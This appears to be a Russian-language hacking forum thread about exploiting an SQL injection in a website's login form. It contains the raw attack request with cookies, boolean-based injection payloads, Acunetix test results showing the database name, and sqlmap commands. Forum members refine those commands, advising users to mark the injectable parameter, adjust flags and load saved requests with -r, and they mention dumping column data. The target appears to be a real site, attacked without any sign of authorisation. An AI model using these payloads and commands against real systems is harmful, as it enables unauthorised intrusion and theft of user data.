SQLMap и "Окунь"

[RUB1K]

Здаров ребят, с праздником всех!


Возник вопрос, я нашел уязвимость через окуня, потом иду в SQLMap и пытаюсь ее раскрутить

POST /login.php HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.site.com/
Cookie: PHPSESSID=pgqnf9bmtaq0ktuudaq6clldcn; _clck=hvez6a%7C2%7Cfto%7C0%7C1880; _clsk=qy6afr%7C1740312621866%7C10%7C1%7Ce.clarity.ms%2Fcollect; _fbp=fb.1.1740310915961.3339313548639564; googtrans=/en/ar
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: www.site.com
Connection: Keep-alive

email_address=-1'%20OR%203*2*1=6%20AND%20000827=000827%20--%20&password=u]H[ww6KrA9F.x-F&url=https://www.site.com/User_Panel/

Я пишу в SQLMap

sqlmap.py -u "https://site.com/login.php" --data="email_address=kjdg@gmail.com&url=https://www.site.com/User_Panel/" --batch --threads 10 --tamper=space2comment --random-agent --risk 3 --level 4

Верно делаю?

Просто не понятно какой tamper выберать под какой случай

Вот что например выдал окунь

Attack Detailscommon.up
URL encoded POST input email_address was set to -1' OR 3*2*1=6 AND 000827=000827 --

Tests performed:
-1' OR 2+827-827-1=0+0+0+1 -- => TRUE
-1' OR 3+827-827-1=0+0+0+1 -- => FALSE
-1' OR 3*2<(0+5+827-827) -- => FALSE
-1' OR 3*2>(0+5+827-827) -- => FALSE
-1' OR 2+1-1+1=1 AND 000827=000827 -- => FALSE
-1' OR 3*2=5 AND 000827=000827 -- => FALSE
-1' OR 3*2=6 AND 000827=000827 -- => TRUE
-1' OR 3*2*0=6 AND 000827=000827 -- => FALSE
-1' OR 3*2*1=6 AND 000827=000827 -- => TRUE


Original value: testing@example.com
Proof of Exploit
SQL query - SELECT database()
Mrinallive

 

[c0d3x]

sqlmap.py -u "https://site.com/login.php" --data="email_address=kjdg@gmail.com&url=https://www.site.com/User_Panel/" --batch --threads 10 --tamper=space2comment --random-agent --risk 3 --level 4

1. Зачем без необходимости юзать space2comment?
2. У тебя не указан параметр который надо инжектить, к почте добавь *. Как то так должно выглядеть:

   email_address=kjdg@gmail.com*&password=u]H[ww6KrA9F.x-F&url=https://www.site.com/User_Panel/

3. --batch лучше не использовать когда работаешь с таргетом первый раз.
4. --threads 10 тоже лучше убрать, такое количество потоков может потребоваться когда будешь дампить данные из колонок, но не на этапе раскрутки инъекции.

 

[RUB1K]

1. Зачем без необходимости юзать space2comment?
2. У тебя не указан параметр который надо инжектить, к почте добавь *. Как то так должно выглядеть:

   email_address=kjdg@gmail.com*&password=u]H[ww6KrA9F.x-F&url=https://www.site.com/User_Panel/

3. --batch лучше не использовать когда работаешь с таргетом первый раз.
4. --threads 10 тоже лучше убрать, такое количество потоков может потребоваться когда будешь дампить данные из колонок, но не на этапе раскрутки инъекции.

Все получилось, спасибо

 

[RUB1K]

Ребят, подскажите насколько эффективен параметр -r и можно ли просто брать ответ из окуня и заливать его в sqlmap (обозначая уязвимый параметр "*") через -r ?
Или это подходит не ко всем случаям?

 

[Exited3n]

Ребят, подскажите насколько эффективен параметр -r и можно ли просто брать ответ из окуня и заливать его в sqlmap (обозначая уязвимый параметр "*") через -r ?
Или это подходит не ко всем случаям?

Не знаю как в окуне по формату, но из бурпа беру всегда, если формат запроса аналогичный, то проблем быть не должно

 

[RUB1K]

Не знаю как в окуне по формату, но из бурпа беру всегда, если формат запроса аналогичный, то проблем быть не должно

Формат аналогичный, спасибо за ответ Друг

 

[xargs]

Ребят, подскажите насколько эффективен параметр -r

Ты передаешь все заголовки, куки и прочие, так делать правильно. А вот создавать темы под каждый нубский вопрос делать очень не правильно и не красиво когда есть для этого заготовленые темы.